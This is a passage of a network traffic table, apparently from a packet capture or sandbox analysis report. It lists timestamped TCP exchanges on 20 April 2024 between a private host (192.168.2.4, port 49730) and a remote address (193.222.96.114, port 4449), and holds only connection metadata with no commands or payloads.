Apr 20, 2024 10:19:04.267946959 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:04.268060923 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:04.468741894 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:04.510215998 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:04.709273100 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:04.710752010 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:04.955555916 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:04.955643892 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:05.205774069 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:11.666806936 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:11.908811092 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:11.908878088 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:12.110089064 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:12.150804996 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:12.350780964 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:12.352478981 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:12.596307039 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:12.596368074 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:12.846132994 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:22.557532072 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:22.799189091 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:22.799276114 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:23.002378941 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:23.057070971 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:23.256331921 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:23.264717102 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:23.517878056 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:23.519745111 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:23.767826080 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:36.588901997 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:36.830914021 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:36.830995083 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:37.031797886 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:37.091718912 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:37.294053078 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:37.302164078 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:37.565788031 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:37.567773104 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:37.774029970 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:37.825725079 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:38.024827957 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:38.031727076 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:38.298969030 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:38.299038887 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:38.549369097 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:41.779727936 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:42.033808947 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:42.034018993 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:42.235289097 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:42.275832891 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:42.475251913 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:42.477235079 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:42.721179962 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:42.721260071 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:42.971373081 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:42.971451044 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:43.172864914 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:43.214117050 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:43.412944078 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:43.414868116 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:43.658490896 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:43.659795046 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:43.908442020 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:57.526086092 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:57.767800093 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:57.767875910 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:57.968595028 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:58.010194063 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:58.209873915 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:58.212950945 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:58.455215931 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:19:58.455730915 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:19:58.705383062 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:12.245081902 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:12.486665964 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:12.486741066 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:12.687424898 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:12.728933096 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:12.929799080 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:12.931580067 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:13.174305916 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:13.179747105 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:13.424252033 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:13.619841099 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:13.861746073 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:13.862263918 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:14.068340063 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:14.119586945 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:14.318921089 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:14.320976019 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:14.564934969 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:14.564996004 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:14.817154884 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:19.916686058 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:20.158382893 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:20.158457041 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:20.358746052 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:20.400825977 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:20.599632978 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:20.601475954 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:20.845763922 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:20.846365929 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:21.095868111 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:25.979157925 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:26.221091032 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:26.221184015 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:26.425781965 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:26.478946924 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:26.678265095 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:26.680150032 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:26.924226999 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:26.924302101 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:27.174348116 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:29.779697895 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:30.033683062 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:30.039678097 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:30.240197897 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:30.291467905 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:30.490618944 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:30.493357897 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:30.737617016 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:30.737680912 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:30.986681938 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:36.932312965 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:37.174084902 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:37.174268961 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:37.374916077 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:37.418203115 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:37.617552042 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:37.619271994 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:37.861643076 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:37.861788988 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:38.112013102 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:42.494888067 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:42.736486912 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:42.736553907 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:42.936418056 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:42.978940964 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:43.177968979 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:43.181123018 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:43.424295902 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:43.427709103 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:43.674841881 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:54.916750908 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:55.158238888 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:55.158302069 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:55.358663082 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:55.400842905 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:55.599873066 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:55.602018118 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:55.845987082 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:55.849839926 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:56.095791101 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:00.354365110 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:00.595860004 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:00.595995903 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:00.802254915 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:00.854063988 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:01.052922964 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:01.054197073 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:01.299246073 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:01.302352905 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:01.548773050 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:07.010512114 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:07.252757072 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:07.258472919 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:07.459393024 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:07.511667013 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:07.710414886 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:07.717989922 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:07.970920086 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:07.978080988 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:08.220859051 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:09.448154926 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:09.689824104 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:09.695761919 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:09.899827003 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:09.947767019 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:10.146950006 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:10.149661064 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:10.392666101 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:10.392734051 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:10.642771006 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:12.166685104 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:12.408283949 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:12.408355951 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:12.608431101 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:12.650832891 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:12.849685907 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:12.851211071 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:13.096019030 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:13.096120119 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:13.345940113 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:24.573182106 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:24.814428091 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:24.814486980 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:25.014925957 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:25.063379049 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:25.262423992 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:25.267167091 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:25.517707109 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:25.517831087 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:25.768084049 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:39.295656919 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:39.549101114 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:39.551664114 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:39.752304077 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:39.807081938 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:40.006201982 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:40.008907080 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:40.252151012 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:40.259730101 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:40.501919985 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:42.791719913 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:43.033513069 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:43.033597946 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:43.237871885 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:43.364079952 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:43.563338041 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:43.565804005 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:43.814551115 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:43.814604998 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:44.064618111 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:44.667649031 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:44.908497095 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:44.908673048 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:45.119687080 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:45.260229111 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:45.459321976 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:45.461055994 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:45.705168962 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:45.705225945 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:45.955584049 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:50.291949987 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:50.533210993 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:50.535696030 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:50.738360882 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:50.963608027 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:51.162642002 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:51.169663906 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:51.430984974 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:51.431044102 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:51.674175978 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:55.604240894 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:55.846261024 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:55.846338034 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:56.047058105 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:56.088323116 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:56.287678957 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:56.289288044 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:56.533498049 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:56.533951998 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:56.740469933 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:56.794245958 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:56.993604898 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:56.995490074 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:57.236463070 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:57.237963915 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:57.486335039 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:01.604167938 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:01.845654011 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:01.845727921 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:02.045949936 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:02.113437891 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:02.312366009 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:02.312957048 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:02.564448118 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:02.564522028 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:02.814445972 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:16.323276997 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:16.564642906 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:16.564846039 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
